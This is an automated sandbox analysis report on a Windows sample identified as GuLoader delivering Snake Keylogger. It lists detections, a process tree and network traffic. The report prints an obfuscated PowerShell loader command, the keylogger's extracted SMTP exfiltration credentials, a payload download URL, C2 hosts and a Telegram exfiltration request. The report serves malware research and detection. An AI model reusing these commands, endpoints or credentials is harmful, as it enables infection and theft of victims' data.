Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1518332
MD5:7fbb332b55f872e61c8307e0b5242287
SHA1:b499466240ef01da4a2cf380d709752b2e44232a
SHA256:9845acc424512cc5b0c67de96ce917624b5e80ee95ea4ea6a7cbc37b7c03ef63
Tags:exeuser-abuse_ch
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Powershell drops PE file
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7420 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7FBB332B55F872E61C8307E0B5242287)
    • powershell.exe (PID: 7496 cmdline: "powershell.exe" -windowstyle minimized "$Sprag=Get-Content 'C:\Users\user\AppData\Local\acneform\Camomiles.Bev';$Depurge=$Sprag.SubString(30781,3);.$Depurge($Sprag)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wabmig.exe (PID: 8168 cmdline: "C:\Program Files (x86)\windows mail\wabmig.exe" MD5: BBC90B164F1D84DEDC1DC30F290EC5F6)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "nicklog@wxtp.store", "Password": "7213575aceACE@@  ", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2695880589.0000000022DE1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000007.00000002.2695880589.0000000022EE5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000002.2217265751.000000000B997000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: wabmig.exe PID: 8168JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: wabmig.exe PID: 8168JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Potential Binary Or Script Dropper Via PowerShell
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7496, TargetFilename: C:\Users\user\AppData\Local\acneform\Tjenestepligterne\file.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Sprag=Get-Content 'C:\Users\user\AppData\Local\acneform\Camomiles.Bev';$Depurge=$Sprag.SubString(30781,3);.$Depurge($Sprag)" , CommandLine: "powershell.exe" -windowstyle minimized "$Sprag=Get-Content 'C:\Users\user\AppData\Local\acneform\Camomiles.Bev';$Depurge=$Sprag.SubString(30781,3);.$Depurge($Sprag)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7420, ParentProcessName: file.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Sprag=Get-Content 'C:\Users\user\AppData\Local\acneform\Camomiles.Bev';$Depurge=$Sprag.SubString(30781,3);.$Depurge($Sprag)" , ProcessId: 7496, ProcessName: powershell.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T16:01:30.954113+020028033053Unknown Traffic192.168.2.849715188.114.97.3443TCP
            2024-09-25T16:01:34.877195+020028033053Unknown Traffic192.168.2.849721188.114.97.3443TCP
            2024-09-25T16:01:39.227302+020028033053Unknown Traffic192.168.2.849727188.114.97.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T16:01:28.683636+020028032742Potentially Bad Traffic192.168.2.849711132.226.247.7380TCP
            2024-09-25T16:01:30.386762+020028032742Potentially Bad Traffic192.168.2.849711132.226.247.7380TCP
            2024-09-25T16:01:31.683648+020028032742Potentially Bad Traffic192.168.2.849716132.226.247.7380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T16:01:26.987824+020028032702Potentially Bad Traffic192.168.2.849710185.29.11.5380TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://aborters.duckdns.org:8081URL Reputation: Label: malware
            Source: http://anotherarmy.dns.army:8081URL Reputation: Label: malware
            Found malware configuration
            Source: 00000007.00000002.2695880589.0000000022DE1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "nicklog@wxtp.store", "Password": "7213575aceACE@@ ", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\acneform\Tjenestepligterne\file.exeReversingLabs: Detection: 21%
            Multi AV Scanner detection for submitted file
            Source: file.exeReversingLabs: Detection: 21%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Tries to detect the country of the analysis system (by using the IP)
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49713 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49730 version: TLS 1.2
            Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2216409652.0000000008695000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: qm.Core.pdb source: powershell.exe, 00000002.00000002.2212699188.000000000750D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2216409652.000000000864F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl source: powershell.exe, 00000002.00000002.2212699188.00000000074F1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2212699188.00000000074F1000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C63
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004068B4 FindFirstFileW,FindClose,0_2_004068B4
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 4x nop then jmp 0094F8E9h7_2_0094F631
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 4x nop then jmp 0094FD41h7_2_0094FA8D
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 4x nop then jmp 25D431E0h7_2_25D42DC8
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 4x nop then jmp 25D42C19h7_2_25D42968
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 4x nop then jmp 25D40D0Dh7_2_25D40B30
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 4x nop then jmp 25D41697h7_2_25D40B30
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 4x nop then jmp 25D431E0h7_2_25D42DBE
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 4x nop then jmp 25D4DC51h7_2_25D4D9A8
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 4x nop then jmp 25D4D7F9h7_2_25D4D550
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 4x nop then jmp 25D431E0h7_2_25D4310E
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 4x nop then jmp 25D4D3A1h7_2_25D4D0F8
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 4x nop then jmp 25D4CF49h7_2_25D4CCA0
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_25D40040
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 4x nop then jmp 25D4FAB9h7_2_25D4F810
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 4x nop then jmp 25D4F661h7_2_25D4F3B8
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 4x nop then jmp 25D4F209h7_2_25D4EF60
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 4x nop then jmp 25D4EDB1h7_2_25D4EB08
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 4x nop then jmp 25D4E959h7_2_25D4E6B0
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 4x nop then jmp 25D4E501h7_2_25D4E258
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 4x nop then jmp 25D4E0A9h7_2_25D4DE00

            Networking

            barindex
            Uses the Telegram API (likely for C&C communication)
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:093954%0D%0ADate%20and%20Time:%2025/09/2024%20/%2022:55:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20093954%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49716 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49710 -> 185.29.11.53:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49711 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49727 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49715 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49721 -> 188.114.97.3:443
            Source: global trafficHTTP traffic detected: GET /fhSIfglR68.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 185.29.11.53Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49713 version: TLS 1.0
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:093954%0D%0ADate%20and%20Time:%2025/09/2024%20/%2022:55:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20093954%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /fhSIfglR68.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 185.29.11.53Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 25 Sep 2024 14:01:41 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: wabmig.exe, 00000007.00000002.2683738778.0000000007843000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 00000007.00000002.2683416849.0000000007580000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://185.29.11.53/fhSIfglR68.bin
            Source: wabmig.exe, 00000007.00000002.2683738778.0000000007843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.29.11.53/fhSIfglR68.bin;
            Source: wabmig.exe, 00000007.00000002.2695880589.0000000022DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: wabmig.exe, 00000007.00000002.2695880589.0000000022DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: wabmig.exe, 00000007.00000002.2695880589.0000000022DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: wabmig.exe, 00000007.00000002.2695880589.0000000022DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: powershell.exe, 00000002.00000002.2212699188.00000000074A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft0Wq
            Source: file.exe, file.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000002.00000002.2210698080.0000000005DF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000002.00000002.2207916280.0000000004EE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000002.00000002.2207916280.0000000004D91000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 00000007.00000002.2695880589.0000000022DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: wabmig.exe, 00000007.00000002.2695880589.0000000022DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: powershell.exe, 00000002.00000002.2207916280.0000000004EE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: powershell.exe, 00000002.00000002.2207916280.0000000004D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: wabmig.exe, 00000007.00000002.2695880589.0000000022EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: wabmig.exe, 00000007.00000002.2695880589.0000000022EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
